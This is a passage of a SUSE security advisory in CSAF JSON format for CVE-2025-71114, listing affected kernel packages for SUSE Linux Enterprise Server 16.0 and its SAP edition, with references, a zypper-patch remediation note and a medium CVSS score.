"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71114",
"url": "https://www.suse.com/security/cve/CVE-2025-71114"
},
{
"category": "external",
"summary": "SUSE Bug 1256752 for CVE-2025-71114",
"url": "https://bugzilla.suse.com/1256752"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
